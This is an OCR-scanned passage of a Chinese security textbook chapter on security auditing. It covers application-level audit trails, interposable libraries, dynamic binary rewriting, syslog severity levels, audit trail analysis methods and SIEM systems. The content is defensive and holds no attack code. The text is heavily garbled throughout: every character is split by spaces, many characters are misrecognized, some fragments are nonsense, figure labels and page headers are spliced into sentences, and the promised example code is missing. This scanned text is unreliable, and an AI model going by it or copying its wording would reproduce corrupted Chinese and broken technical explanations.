种 类 型 的 可 被 利用 的 漏洞 是 对 输入 数据 缺乏 动态 检查 ， 这 将 可 能 造成 缓冲 区 溢出 的 发 生 (请 参 
阅 第 10 章 )。 其 他 漏洞 攻击 利用 了 应 用 程序 逻辑 中 的 错误 。 例 如 ， 特 权 应 用 程序 可 能 会 被 设计 
成 阅读 和 打印 特定 的 文件 。 该 应 用 程序 中 的 错误 ， 可 能 允许 攻击 者 利用 与 shell 环境 一 次 意外 
的 交互 ， 以 迫使 应 用 程序 可 以 读 取 和 打印 一 个 不 同 的 文件 ， 这 将 导致 安全 威胁 。 

系统 级 的 审计 达 不 到 能 够 捕获 应 用 程序 逻辑 错误 行为 的 细 臻 程度。 而且， 入 侵 检测 系统 查 
找 攻 击 特征 或 者 没有 被 捕获 的 基于 应 用 程序 逻辑 错误 的 攻击 的 异常 行为 。 为 了 检测 和 审计 ， 需 
要 捕获 应 用 程序 的 详细 行为 数据 ， 而 不 仅仅 是 对 系统 服务 和 文件 系统 的 访问 行为 。 需 要 检测 到 
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的 应 用 程序 级 攻击 信息 ， 可 能 已 丢失 或 者 难以 从 低级 别 信息 中 提取 ， 低 级 别 信息 包括 在 系统 调 
用 踪迹 和 由 操作 系统 产生 的 审计 迹 中 。 


表 18-5 UNIX 系统 日 志 程序 和 严重 级 别 
a) 系统 日 志 程 序 


b) 系统 日 志 严 重 级 别 


严重 级 别 说 OB 
紧急 (emerg ) 最 严重 的 消息 ， 如 立即 系统 关闭 
报警 (alert) 系统 情况 需要 立即 关注 
标准 (crit) 系统 紧急 情况 ， 如 硬件 或 软件 的 操作 失败 
错误 (err) 其 他 系统 错误 ; 可 恢复 
警告 (warning ) 警告 消息 ; 可 恢复 
注意 (notice) 有 益 于 调查 的 异常 情况 ; 一 个 重要 事件 ， 通 常 是 正常 的 日 常 操作 的 一 部 分 
信息 (info) 信息 性 消息 
调试 (debug) 用 于 调试 目的 的 消息 


接着 ， 我 们 讨论 从 应 用 程序 收集 审计 数据 的 两 种 方法 : 插入 库 (interposable library) 和 动 
态 二 进 制 重 写 。 


18.3.3 AE 


[KUPE99] 和 [KUPE04] 中 对 插入 库 技术 进行 了 描述 ， 该 技术 通过 创建 新 过 程 来 提供 应 
用 程序 级 的 审计 ， 这 些 新 过 程 通 过 拦截 共享 库 函 数 的 调用 来 监视 应 用 程序 的 活动 。 插 入 位 置 
(interposition) 可 以 在 不 需要 重新 编译 系统 库 和 应 用 程序 的 前 提 下 生成 审计 数据 。 因 此 ， 和 审计 
数据 的 生成 不 需要 改变 系统 共享 库 ， 也 不 需要 与 插入 点 相关 的 源 代码 。 这 种 方法 可 用 于 任何 
UNIX 或 Linux 操作 系统 ， 以 及 某 些 其 他 操作 系统 。 

此 方法 利用 了 UNIX 中 动态 库 的 使 用 。 在 讨论 该 技术 之 前 ， 我 们 先 简短 介绍 一 下 共享 库 的 
背景 知识 。 

共享 库 ”操作 系统 在 存档 库 中 包括 数 百 个 C 库 函 数 。 每 个 库 由 一 组 编译 和 链接 在 一 起 的 
变量 和 函数 组 成 。 链 接 函 数 对 库 中 数据 和 程序 代码 的 所 有 内 存 引 用 进行 解析 ， 生 成 逻辑 地 址 或 
相对 地 址 。 根 据 编译 需求 ， 一 个 函数 可 以 被 链接 到 可 执行 程序 。 如 果 函 数 不 是 程序 代码 的 一 
部 分 ， 链 接 加 载 程序 搜索 库 的 列表 并 链接 所 需 对 象 到 目标 可 执行 文件 。 加 载 过 程 中 ， 一 个 链 
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接 库 函数 的 独立 副本 被 加 载 到 该 程序 的 虚拟 内 存 。 此 方案 被 称 为 静态 链接 库 ( statically linked 
library ) 。 

UNIX System V 版 本 3 首次 引入 了 一 种 更 加 灵活 的 方案 ， 它 使 用 的 是 静态 链接 共享 库 
( statically linked shared library)。 和 使 用 静态 链接 库 一 样 ， 引 用 的 共享 对 象 在 链接 时 ， 由 链接 加 
载 程 序 将 其 合并 到 目标 可 执行 程序 。 但 是 ， 静 态 链接 的 共享 库 中 的 每 个 对 象 都 被 分 配 一 个 固定 
的 虚拟 地 址 。 当 创建 可 执行 程序 时 ， 通 过 给 它们 分 配 的 虚拟 地 址 ， 链 接 加 载 程序 将 外 部 引用 的 
对 象 链接 到 男 数 库 中 它 的 定义 。 因 此 ， 每 个 库 函 数 只 存在 一 个 副本 。 进 一 步 ， 可 以 修改 该 函数 
并 将 其 保留 在 它 的 固定 的 虚拟 地 址 中 。 只 有 对 和 象 需要 重新 编译 ， 而 引用 它 的 可 执行 程序 无 须 重 
新 编译 。 但 是 ， 修 改 通常 是 较 小 的 ， 修 改 必 须 以 这 种 方式 进行 : 代码 中 的 起 始 地 址 和 任何 变 
量 、 常 量 或 程序 标签 的 地 址 不 能 改变 。 

UNIX System V 版 本 4 引入 了 动态 链接 共享 库 ( dynamically-linked shared library) 的 概念 
使 用 动态 链接 库 ， 到 共享 库 例 程 的 链接 会 推迟 到 函数 的 加 载 时 。 此 时 ， 所 需 函 数 库 内 容 被 映射 
到 进程 的 虚拟 地 址 空间 。 因 此 ， 如 果 在 加 载 之 前 对 函数 库 进 行 了 更 改 ， 引 用 函数 库 的 任何 程序 
是 不 受 影响 的 。 

对 于 静态 和 动态 链接 共享 库 ， 共 享 页 中 的 内 存 页 必须 标记 为 只 读 。 如 果 某 个 程序 需要 在 共 
享 页 上 执行 内 存 更 新 ， 系 统 应 使 用 写 时 复制 (copy-on-write) 方案 ， 系 统 给 该 进程 分 配 内 存 页 
的 副本 ， 这 个 副本 可 以 被 修改 而 不 会 影响 使 用 该 内 存 页 的 其 他 用 户 。 

插入 库 的 使 用 图 18-7a 指 出 了 程序 调用 动态 链接 共享 库 中 的 一 个 例 程 时 操作 的 正常 模 
式 。 在 加 载 时 ， 程 序 中 例 程 foo 的 引用 被 解析 为 共享 库 中 的 foo 的 开始 虚拟 内 存 的 地 址 。 

使 用 函数 库 插 和 人 的 方法 来 构造 特殊 的 插 人 库 ， 以 便 在 加 载 时 程序 链接 到 插 人 库 ， 而 不 是 共 
享 库 。 对 于 审计 调用 的 共享 库 中 的 每 个 六 数 ， 插 人 库 包含 具有 相同 名 称 的 图 数 。 如 果 插 人 库 中 
不 包含 所 需 函 数 ， 加 载 程序 继续 在 共享 库 
搜索 并 直接 与 目标 函数 链接 。 共享 库 

插入 模块 可 以 执行 任何 与 审计 相关 的 
功能 ， 比 如 记录 调用 的 发 生 、 传 人 和 返回 
的 参数 以 及 调用 程序 的 返回 地 址 等 。 通 
W, HARR HK Dad FA SE Pa BY FES RCL 
图 18-7b)， 以 保证 应 用 程序 的 行为 仅 被 监 
控 ， 而 不 被 改变 。 

这 种 技术 允许 拦截 某 些 函数 调用 和 存 
储 状态 ， 并 且 在 这 些 调用 之 间 无 须 重 新 编 
译 调用 程序 或 共享 对 象 。 

[KUPE99] 提供 了 一 个 用 C 编写 的 插入 ”应 用 程序 
EKZ ( 见 图 18-8) 的 一 个 实例 。 此 函数 的 IE 
描述 如 下 : 

1. AUDIT CALL START (第 8 行 ) 位 
于 每 个 可 插入 函数 的 开头 。 这 使 得 将 任意 PO 
初始 化 代码 插入 到 每 个 函数 很 容易 。 ins Fi bea 

2. AUDIT LOOKUP COMMAND 
(图 18-8a 第 10747, PET TERI 18-8b 中 ) 使 
FA disym (3x) 命令 在 共享 库 中 查找 指 问 b) 可 插入 的 库 调 用 
下 一 个 函数 定义 的 指针 。 特 殊 标 志 RTLD_ 图 18-7 插入 库 的 使 用 








R18 ZARY 401 


NEXT (图 18-8b 第 2 行 ) 表示 ， 由 运行 时 加 载 程序 使 用 的 库 搜索 路 径 的 下 一 个 引用 将 返回 。 
如 果 引 用 被 找到 或 向 调用 程序 返回 错误 值 ， 函 数 指 针 将 被 存储 在 fptr。 

3. 第 12 行 包含 该 也 数 调用 之 前 执行 的 命令 。 

4. 在 这 种 情况 下 ， 插 入 的 函数 执行 原来 的 函数 调用 并 将 值 返回 给 用 户 (第 14 行 )。 其 他 可 
能 的 操作 包括 : 参数 的 检查 、 记 录 或 转换 ; 库 调 用 实际 执行 的 预防 ; 以 及 返回 值 的 检查 、 记 录 
或 转换 。 


5. 在 结果 返回 前 ， 附 加 代码 可 能 被 插入 (第 16 行 ), 但 是 本 例 中 没有 插入 。 
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a) 函数 定义 (全 部 大 写 项 表示 其 他 位 置 定义 的 宏 ) 


iiss 


b) 用 在 函数 中 的 宏 
图 18-8 ”在 插入 库 中 的 函数 实例 


18.3.4 动态 二 进 制 重 与 


搬入 技术 旨 在 使 用 动态 链接 的 共享 库 。 它 不 能 拦截 静态 链接 程序 的 函数 调用 ， 除 非 系统 中 
的 所 有 程序 在 审计 库 引 入 时 都 重新 链接 。[ZHOU04] 介绍 了 一 种 方法 ， 此 方法 称 为 动态 二 进 制 
重 写 ， 可 用 于 静态 和 动态 链接 的 程序 。 

动态 二 进 制 重 写 是 一 种 直接 更 改 可 执行 的 二 进 制 代码 的 后 编译 技术 。 更 改 在 加 载 时 进行 并 
且 仅 修改 程序 的 内 存 镜像 ， 而 不 是 辅助 存储 上 的 二 进 制 程序 文件 。 与 插 人 技术 一 样 ， 动 态 二 进 
制 重 写 不 需要 重新 编译 应 用 程序 二 进 制 文件 。 审 计 模 块 选择 一 直 被 推迟 到 应 用 程序 被 调用 ， 以 
便 进行 审计 配置 的 灵活 选择 。 

这 个 技术 在 Linux 上 利用 两 个 模块 实现 : 一 个 是 可 加 载 核心 模块 ， 另 一 个 是 监控 守护 进程 。 
Linux 是 由 一 系列 模块 构成 的 ， 大 量 的 模块 可 以 根据 需要 自动 加 载 和 件 载 。 这 些 相 对 独立 的 块 
(block) 被 称 为 可 加 载 模块 (loadable module) [GOYE99]。 从 本 质 上 讲 ， 模 块 是 一 个 对 象 文 件 ， 
其 代码 可 以 在 运行 时 链接 到 内 核 和 从 内 核 断 开 链 接 。 通 常 ， 模 块 实现 某 些 特定 功能 ， 比 如 一 个 
文件 系统 、 设 备 驱 动 程序 ， 或 某 些 内 核 上 层 的 其 他 功能 。 模 块 不 作为 自己 的 进程 或 线程 执行 ， 
虽然 它 可 以 根据 需要 创建 用 于 各 种 用 途 的 内 核 线程 。 更 确切 地 讲 ， 模 块 是 代表 当前 进程 在 内 核 
模式 下 执行 的 。 

图 18-9 显示 了 这 种 方法 的 结构 。 内 核 模块 可 通过 截获 execve() 系统 调用 来 确保 不 可 绕 过 
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AY. execve() 函数 的 作用 就 是 ， 当 有 一 个 新 的 可 执行 文件 需要 运行 时 ， 将 其 加 载 到 一 个 新 
的 进程 地 址 空间 并 开始 执行 它 。 通 过 截获 此 系统 调用 ， 内 核 模块 就 可 以 使 应 用 程序 在 执行 其 第 
一 条 指令 之 前 将 应 用 程序 的 执行 停止 ， 并 在 执行 开始 之 前 插入 审计 例 程 。 

应 用 程序 的 安装 实际 是 由 监控 守护 进 
程 执行 的 ， 它 是 一 个 特权 用 户 空 间 进程 。 
守护 进程 管理 两 个 库 : 补丁 程序 库 和 审计 函 
数 库 。 补 丁 程序 库 包 含 为 应 用 程序 安装 审 
计 的 代码 。 审 计 函 数 库 包 含 用 来 插入 到 应 
用 程序 的 审计 代码 。 审 计 和 补丁 程序 库 中 
的 代码 具有 动态 库 的 形式 。 通 过 使 用 动态 
库 ， 在 守护 进程 运行 时 可 以 更 新 库 中 的 代 
码 。 此 外 ， 在 同一 时 间 可 以 存在 多 个 版 本 
的 库 。 

事件 序列 如 下 所 示 : 

1. 受 监控 的 应 用 程序 是 由 execve() 系统 
调用 来 调用 的 。 操作 系统 内 核 

2 内 核 模块 截 效 访 系统 调用 并 停止 应 图 18-9 应 用 程序 审计 的 运行 时 环境 
用 程序 ， 并 为 守护 进程 设置 该 进程 的 父 进 
程 。 然 后 内 核 模块 通知 用 户 空 间 守 护 程序 ， 受 监控 的 应 用 程序 已 启动 。 

3. 监控 守护 进程 找到 补丁 程序 和 适用 于 此 应 用 程序 的 审计 库 函 数 。 守 护 进程 将 审计 库 函 数 
加 载 到 应 用 程序 的 地 址 空间 ， 并 且 在 应 用 程序 的 代码 中 某 些 点 插入 审计 函数 调用 。 

4. 在 应 用 程序 已 完成 审计 安装 后 ， 守 护 进程 使 应 用 程序 开始 执行 。 

一 种 特殊 的 语言 被 开发 用 于 简化 创建 审计 和 补丁 程序 代码 的 过 程 。 从 本 质 上 讲 ， 补 丁 程序 
可 以 在 函数 调用 的 任何 点 被 插入 到 一 个 共享 库 例 程 。 此 补丁 程序 可 以 调用 审计 例 程 ， 也 可 以 调 
用 共享 库 例 程 ， 逻 辑 上 类 似 于 前 面 所 述 的 插 人 技术 。 


18.4 审计 迹 分 析 


由 于 系统 配置 、 关 注 的 领域 、 可 用 的 软件 、 企 业 的 安全 策略 ， 以 及 合法 用 户 与 人 侵 者 的 行 
为 模式 等 各 有 不 同 ， 所 以 用 于 审计 迹 分 析 的 程序 和 过 程 非常 之 多 。 本 节 介 绍 了 一 些 我 们 所 了 解 
的 关于 审计 迹 分 析 的 情况 。 


18.4.1 准备 


为 了 进行 有 用 的 审计 分 析 ， 分 析 员 或 安全 管理 员 需 要 了 解 可 用 信息 以 及 如 何 使 用 它 。 
NIST SP 800-92 在 这 方面 提供 了 一 些 有 用 的 建议 ， 本 小 节 对 此 做 了 一 个 汇总 。 

Big toon 安全 管理 员 (或 其 他 复核 和 分 析 日 志 的 个 人 ) 需要 了 解 单个 日 志 记录 的 上 

。 相 关 的 信息 可 能 存放 在 同一 日 志 的 其 他 记录 中 ， 或 存放 在 其 他 日 志 的 记录 中 ， 也 可 能 存 
E A 全 mb WCG 
件 包 查找 恶意 活动 时 会 产生 大 量 的 误 报 。 

大 多 数 审 计 文件 格式 混杂 着 多 种 明文 语言 和 加 密 的 消息 或 代码 。 这 些 消息 和 代码 对 软件 供 
应 商 有 意义 但 对 管理 员 来 说 却 不 是 必需 的 。 管 理 员 必须 努力 解密 ， 尽 可 能 多 地 获取 日 志 记 录 中 
包含 的 信息 。 在 某 些 情况 下 ， 日 志 分 析 软 件 执行 数据 精简 任务 ， 以 减少 管理 员 的 负担 。 尽 管 如 
此 ， 管 理 员 应 该 对 输入 到 分 析 和 复核 软件 的 原始 数据 有 一 定 的 了 解 ， 以 便 能 够 评估 这 些 程序 包 





HISF AFH 403 


的 实用 价值 。 

能 够 清楚 地 了 解 日 志 数 据 的 最 有 效 的 方法 是 定期 (例如 ， 每 天 ) 复核 并 分 析 它 的 一 部 分 
数据 。 目 标 是 最 终了 解 典 型 的 日 志 记 录 的 基线 ， 其 上 可 能 包含 了 系统 上 的 日 志 记 录 的 大 部 分 
内 容 。 

TRETI ”要 进行 有 效 的 复核 和 分 析 ， 管理 员 应 该 从 培训 或 实际 经 验 中 获得 对 以 下 内 容 
的 清楚 了 解 : 

© 机 构 关 于 可 接受 使 用 的 策略 ， 以 便 管理 员 能 够 识别 对 策略 的 违背 情况 。 

e 他 们 的 主机 使 用 的 安全 软件 ， 包 括 每 个 程序 可 以 检测 的 与 安全 相关 的 事件 类 型 和 每 个 

程序 通常 的 检测 配置 文件 (例如 ， 已 知 的 误 报 )。 

e 他 们 的 主机 使 用 的 操作 系统 和 主要 的 应 用 程序 〈 例 如， 电子 邮件 、Web)， 尤 其 是 每 个 

操作 系统 和 主要 应 用 程序 的 安全 性 以 及 日 志 能 力 和 特征 。 

e 常见 攻击 技术 的 特征 ， 尤 其 是 这 些 技术 的 使 用 是 如 何 被 记录 在 每 个 系统 上 的 。 

e 用 于 分 析 的 软件 包括 : 日 志 查 看 器 、 记 录 精 简 脚 本 和 数据 库 查 询 工具 。 


18.4.2 ”时间 


审计 迹 可 以 以 多 种 方式 使 用 。 分 析 的 类 型 至 少 在 一 定 程 度 下 取决 于 分 析 何 时 完成 。 可 能 的 
情况 包括 : 
e 事件 发 生 后 的 审计 迹 复核 : 这 种 类 型 的 复核 由 一 个 观察 到 的 事件 触发 ， 例 如 ， 可 以 是 
一 个 已 知 的 系统 或 应 用 程序 软件 问题 ， 也 可 以 是 用 户 引起 的 违背 现 有 安全 策略 的 事件 
或 者 某 些 无 法 解释 的 系统 或 用 户 问 题 。 复 核能 够 收集 信息 以 详细 了 解 该 事件 已 知 的 情 
况 ， 从 而 诊断 原因 或 发 现 问题 ， 并 提出 补救 措施 和 对 策 。 这 种 类 型 的 复核 重点 是 那些 
与 特定 事件 相关 的 审计 迹 记 录 。 
e 审计 迹 数 据 的 定期 复核 : 此 类 型 的 复核 是 检查 所 有 审计 迹 数据 或 者 已 定义 的 审计 迹 数 
据 子 集 ， 并 且 有 许多 可 能 的 目标 。 目 标的 实例 包括 : 查找 能 够 显示 安全 问题 的 事件 或 
模式 ， 开 发 正常 的 行为 配置 文件 ， 搜 索 异 常 行为 ， 以 及 开发 个 人 用 户 的 配置 文件 来 维 
护 用 户 的 永久 记录 等 。 
实时 审计 分 析 : 也 可 以 以 实时 或 接近 实时 的 方式 使 用 审计 分 析 工 具 。 实 时 分 析 是 入 侵 
检测 功能 的 一 部 分 。 


18.43 ”审计 复核 


审计 复核 与 使 用 数据 精简 和 分 析 工 具 的 审计 迹 数据 分 析 的 不 同 之 处 是 审计 复核 的 概念 。 审 
计 复 核 功 能 使 管理 员 能 够 从 选 定 的 审计 迹 中 读 取 信息 。 通 用 标准 规范 [CCPS12a] 要 求 的 一 项 功 
能 是 允许 预先 存储 或 事后 存储 审计 所 选 内 容 ， 并 且 包 括 能 够 有 选择 地 查看 以 下 内 容 的 能 力 : 

e 一 个 或 多 个 用 户 的 动作 (例如 ， 识别、 身份 验证 、 系 统 输入 和 访问 控制 动作 )。 

© 对 一 个 特定 的 对 象 或 系统 资源 执行 的 动作 。 

e 所 有 或 一 组 指定 的 审计 异常 。 

e 与 一 个 特定 的 系统 或 安全 属性 相关 的 动作 。 

审计 复核 可 以 重点 关注 匹配 特定 属性 的 记录 ， 如 用 户 或 用 户 组 、 时 间 和 窗口 和 记录 类 型 等 。 

可 用 于 审计 复核 自动 化 的 工具 是 基于 管理 员 输 入 的 审计 记录 的 优先 级 划分 工具 。 记 录 可 以 
根据 因素 的 组 合 确定 优先 级 。 实 例 包括 以 下 内 容 : 

e 记录 类 型 (例如 ， 消 息 代码 103、 消 息 类 CRITICAL), 

e 记录 类 型 是 否 为 新 的 ( 即 以 前 的 日 志 中 是 否 出 现 过 此 类 型 的 记录 )。 
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e 日 志 源 。 
e 源 或 目标 IP 地 址 〈 例 如 ， 在 黑 名单 上 的 源 地 址 、 关 键 系统 的 目标 地 址 、 涉 及 特定 IP 地 
址 的 以 前 事件 )。 

e 一 天 内 的 某 段 时 间或 一 周 内 的 某 一 天 〈 例 如， 一 条 记录 可 能 在 特定 时 间 被 接受 ， 但 不 

”允许 在 其 他 时 间 被 接受 )。 

e 记录 的 频率 (例如 ， 在 y 秒 内 发 生 x 次 )。 

这 种 类 型 的 审计 复核 可 能 的 目的 有 很 多 。 审 计 复核 可 以 使 管理 员 对 系统 当前 操作 及 系统 
上 用 户 和 应 用 程序 配置 文件 、 攻 击 活动 的 级 别 和 其 他 与 安全 和 使 用 情况 相关 的 事件 ， 产 生 一 种 
直观 的 感受 。 审 计 复核 可 以 帮助 理解 ， 攻 击 事件 发 生 后 系统 对 它 的 啊 应 从 而 导致 软件 和 程序 
更 改 。 


18.4.4 数据 分 析 方 法 


用 于 审计 数据 分 析 的 方法 和 算法 的 种 类 很 多 ， 这 里 也 不 便 进 行 详 细 的 介绍 。 基 于 在 
[SING04] 中 的 讨论 ， 我 们 对 一 些 主要 的 方法 作 以 简单 的 介绍 。 

基本 的 报警 ”分 析 的 最 简单 的 形式 是 软件 对 已 发 生 的 特别 突出 的 事件 给 出 提示 。 如 果 提 示 
是 实时 给 出 的 ， 则 它 可 以 充当 入 侵 检测 系统 的 一 部 分 。 对 于 那些 可 能 不 会 引起 入 侵 报 警 的 可 疑 
事件 ， 那 么 要 求 事 后 进一步 进行 分 析 。 

基线 设置 ”基线 设置 是 根据 异常 事件 和 模式 来 定义 正常 事件 和 模式 的 过 程 。 该 过 程 包括 测 
量 一 组 已 知 数据 来 计算 正常 值 的 变化 范围 。 这 些 基线 值 可 以 与 新 的 数据 比较 来 检测 异常 变化 。 
与 基线 相关 的 活动 实例 包括 : 

e 每 个 协议 的 网 络 流量 总 和 总 的 HTTP、 电 子 邮 件 、FTP 等 的 流量 。 
登录 /退出 。 
管理 员 账 户 的 访问 。 
动态 主机 配置 协议 (DHCP) 地 址 管理 、DNS 请 求 。 
每 小 时 / 天 日 志 数 据 的 总 量 。 
在 任何 时 间 运 行 的 进程 数 。 

例如 FTP 通信 流量 大 幅 增加 可 能 表明 你 的 FTP 服务 器 已 经 受到 威胁 并 且 正 在 被 外 部 用 户 
恶意 使 用 。 

一 旦 建立 基线 ， 就 可 以 依据 基线 进行 分 析 。 一 种 在 本 书 经 常 讨论 的 方法 是 异常 检测 。 异 
常 检测 的 一 个 简单 方法 的 实例 是 免费 软件 Never Before Seen (NBS) 异常 检测 驱动 程序 (www. 
ranum.com/security/computer security/code)。 该 工具 实现 了 速度 非常 快 的 字符 串 数据 库 查找 并 
告知 给 定 的 字符 串 是 否 存 在 于 数据 库 中 (H, 已 经 出 现 )。 

考虑 下 面 涉 及 DHCP 的 实例 。DHCP 用 于 网 络 中 主机 的 TCP/IP 配置 。 在 一 个 操作 系统 启 
动 时 ， 客 户 端 主机 发 送 一 个 配置 请 求 , DHCP 服务 器 检测 到 该 请 求 后 ， 它 会 为 客户 端 工作 站 选 
择 适 当 的 配置 参数 (具有 相应 的 子 网 掩 码 和 其 他 可 选 参数 的 IP 地 址 ， 诸 如 默认 网 关 的 卫 地址 、 
DNS 服务 器 的 地 址 和 域名 等 )。DHCP 服务 器 在 预定 范围 和 时 间 (租约 时 间 ) 给 客户 端 分 配 IP 
地 址 。 如 果 一 个 IP 地 址 需要 被 保留 ， 那 么 客户 端 必须 在 租约 过 期 前 请 求 延 期 。 如 果 客 户 端 不 
需要 延长 租约 时 间 ， 那么 这 个 IP 地 址 就 会 被 视 为 是 可 用 的 ， 可 以 分 配给 另 一 个 客户 端 。 这 个 
规则 的 执行 是 自动 透明 的 。 使 用 NBS 可 以 很 容易 监控 机 构 的 网 络 ， 获 得 由 DHCP 服务 圳 租用 
的 新 的 介质 访问 控制 IP ( MAC/IP) 组 合 。 管 理 员 立 即 可 以 了 解 不 是 被 正常 租用 的 新 的 MAC 
地 址 和 了 王 地 址 。 这 可 能 有 也 可 能 没有 安全 隐患 。NBS 还 可 以 用 于 扫描 不 正确 的 记录 、 异 稼 的 
客户 端 查询 以 及 各 种 其 他 模式 。 
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识别 事件 ， 如 连接 被 拒绝 超过 一 定 的 次 数 。 国 值 也 可 以 用 于 关注 其 他 参数 ， 如 事件 的 发 生 频 率 
而 不 是 简单 的 事件 数量 。 

设置 窗口 是 在 给 定 的 一 组 参数 下 的 事件 检测 ， 如 在 给 定 的 时 间 段 内 或 在 给 定时 间 段 外 的 事 
件 。 例如， 为 每 个 用 户 在 一 天 内 设置 时 间 基 线 ， 记 录 并 标记 设置 时 间 外 的 登录 事件 。 

关联 分 析 的 男 一 类 型 是 关联 ， 用 于 寻找 事件 之 间 的 关系 。 关 联 的 一 个 简单 实例 是 ， 给 定 
出 现 的 一 个 特定 的 日 志 消息 ， 在 第 二 次 出 现 该 消息 时 报警 。 例 如 ， 如 果 Snort (参阅 8.71) 报告 
来 自 远程 主 机 的 一 个 缓冲 区 洪 出 的 企图 ， 利 用 关联 可 以 获取 包含 远程 主机 的 IP 地 址 在 内 的 所 有 
消息 。 或者， 管理 员 可 能 会 记录 从 以 前 未 使 用 过 的 远程 主机 上 登录 的 某 个 账户 上 的 所 有 su 命令 


185 ”安全 信息 和 事件 管理 


在 大 型 组 织 中 ， 需 要 能 够 自动 处 理由 当代 网 络 、 服 务 器 和 主机 生成 的 大 量 安全 审计 数据 
的 系统 。 大 量 的 数据 被 生成 ， 以 至 一 个 人 根本 不 可 能 提取 出 及 时 和 有 用 的 信息 。 这 包括 需要 对 
正常 活动 和 立 值 进行 描述 ， 以 便 在 检测 到 异常 或 恶意 模式 时 ， 系 统 将 生成 警报 。 因 此 ， 需 要 茶 
种 集成 的 、 自 动 的 、 集 中 的 日 志 系 统 。 能 够 解决 这 些 问题 的 产品 类 型 称 为 安全 信息 和 事件 管理 
(SIEM) 系统 。 

NIST SP 800-137 (联邦 信息 系统 和 组 织 的 信息 安全 持续 监控 (ISCM), 2011 年 9 月 ) 和 其 
他 标准 认为 需要 将 这 些 系统 作为 关键 的 安全 控制 。[TARA11] 指出 ， 可 以 配置 一 个 SIEM AR, 
以 帮助 实现 SANS 与 其 他 人 开发 的 许多 “20 个 关键 控制 "， 我 们 在 第 12 章 中 提 到 了 这 一 点 。 


SIEM 系统 


SIEM 软件 是 一 个 集中 化 日 志 的 软件 包 ， 类 似 于 系统 日 志 , 但 是 比 系统 日 志 复 杂 。SIEM 
系统 提供 集中 化 、 统 一 的 审计 迹 存储 工具 和 一 组 审计 数据 分 析 程 序 。NIST SP 800-92 中 讨论 了 
日 志 管 理 和 SIEM 系统 。 它 指出 有 两 种 通用 的 配置 方法 ， 但 许多 产品 二 者 可 以 组 合 使 用 : 

e 无 代理 : SIEM 服务 器 从 独立 的 日 志 生 成 主机 接收 数据 ， 而 无 须 在 那些 主机 上 安装 特 

殊 软 件 。 有 些 服 务 器 从 主机 提取 上 日志， 这 要 求 该 服务 器 需要 通过 主机 对 其 进行 认证 才 

能 定期 地 检索 其 日 志 。 在 其 他 情况 下 ， 主 机 将 它们 的 日 志 推 送 (push) 到 服务 恬 ， 这 要 

求 主机 通过 服务 器 对 其 进行 认证 ， 然 后 才能 将 其 日 志 定 期 地 传送 到 服务 右 。 随 后 SIEM [574 
服务 器 进行 事件 过 滤 和 聚集 ， 以 及 对 收集 的 日 志 中 的 日 志 进 行 标准 化 和 分 析 。 

e 基于 代理 : 代理 程序 安装 在 日 志 生 成 主机 进行 事件 过 滤 和 聚集 ， 以 及 对 一 种 特殊 类 型 

的 日 志 进 行 标准 化 ， 然 后 将 标准 化 的 日 志 数 据 传送 给 一 台 SIEM 服务 器 。 对 分 析 和 存 
储 来 说 ， 这 通常 是 实时 或 接近 实时 的 。 如 果 主 机 有 多 种 类 型 相关 的 日 志 ， 那 么 也 许 有 
必要 安装 多 个 代理 。 某 些 SIEM 产品 也 提供 诸如 Syslog 和 SNMP 的 普通 格式 的 代理 。 
一 个 普通 代理 主要 从 这 样 的 信 源 得 到 日 志 数 据 : 信 源 数据 对 特殊 格式 代理 和 无 代理 方 
法 是 不 可 用 的 。 有 些 产品 也 允许 管理 员 创建 定制 代理 来 处 理 无 其 他 支持 的 日 志 源 。 

SIEM 软件 能 识别 各 种 各 样 的 日 志 格 式 ， 包 括 来 自 各 种 各 样 操作 系统 、 安 全 软件 (如 IDS 
和 防火 墙 )、 应 用 服务 器 (如 Web 服务 器 、 电 子 邮 件 服 务 器 )， 甚 至 包括 物理 安全 控制 设备 〈 例 
如 标记 阅读 器 ) 的 日 志 。SIEM 软件 将 这 些 各 种 各 样 的 日 志 记 录 标 准 化 ， 以 便 使 所 有 日 志 记 录 
中 的 同一 个 数据 项 (Al, IP 地 址 ) 使 用 同一 一 种 格式 。 该 软件 可 以 删除 日 志 记 录 中 安全 功能 不 需 
要 的 某 些 域 ， 以 及 不 相关 的 某 些 日 志 记 录 ， 这 样 很 大 程度 上 减少 了 中 央 日 志 的 数据 量 。SIEM 
服务 器 分 析 来 自 多 个 日 志 源 的 联合 数据 ， 关 联 日 志 记 录 中 的 事件 ， 识 别 并 对 重要 事件 进行 优先 
排序 ， 如 果 需 要 的 话 启 动 对 事件 的 响应 。SIEM 产品 通常 包含 以 下 几 个 对 用 户 很 有 用 的 特点 ， 
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例如 
e 特别 设计 的 图 形 用 户 接口 (GUI)， 用 于 协助 分 析 员 确定 潜在 问题 ,复核 与 每 个 问题 相 
关 的 有 效 数 据 。 
e 一 个 安全 知识 库 ， 该 知识 库 包 含 已 知 漏洞 的 信息 、 某 些 日 志 消 息 的 可 能 含义 和 其 他 技 
ORB; 日 志 分 析 员 能 经 常 按照 需要 定制 知识 库 。 
e 事件 跟踪 和 报告 的 功能 ， 有 时 具有 和 鲁 棒 性 工作 流 特征 。 
e 评估 信息 存储 和 关联 (例如 ， 为 目标 是 有 漏洞 的 操作 系统 或 一 个 更 加 重要 的 主机 的 攻 
击 设 定 更 高 的 威胁 级 别 )。 
良好 的 SIEM 系统 可 以 在 组 织 的 安全 基础 设施 中 形成 一 个 关键 的 组 件 。 然 而 ， 许 多 组 织 未 
能 适当 地 计划 、 安 装 和 管理 此 类 系统 。[HADS10] 指出 ， 一 个 适当 的 过 程 包括 定义 威胁 、 记 录 
响应 以 及 配置 标准 报告 以 满足 审计 和 遵从 需求 。 本 文 的 附录 提供 了 可 以 对 特定 组 织 进行 修改 和 
扩展 的 例子 。 所 有 这 些 都 可 以 作为 我 们 在 第 14 章 和 第 15 章 中 讨论 的 更 广泛 的 IT 安全 风险 评 
估 过 程 的 一 部 分 。 本 文 还 列 出 了 一 些 STEM 产品 的 供应 商 。 


186 关键 术语 、 复 习题 和 习题 


关键 术语 

anomaly detection (异常 检测 ) security audit (安全 审计 ) 

application-level audit trail (应 用 程序 级 审计 迹 ) security audit trail (安全 审计 迹 ) 

audit (审计 ) Security Information and Event Management ( SIEM, 
audit review (审计 复核 ) 安全 信息 和 事件 管理 ) 

audit trail (审计 迹 ) shared library (共享 库 ) 

audit trail analysis (审计 迹 分 析 ) statically linked library (静态 链接 库 ) 

baselining (基线 设置 ) statically linked shared library (静态 链接 共享 库 ) 
dynamic binary rewriting (动态 二 进 制 重 写 ) Syslog (系统 日 志 ) 

dynamically linked shared library (动态 链接 共享 库 ) system-level audit trail (系统 级 审计 迹 ) 
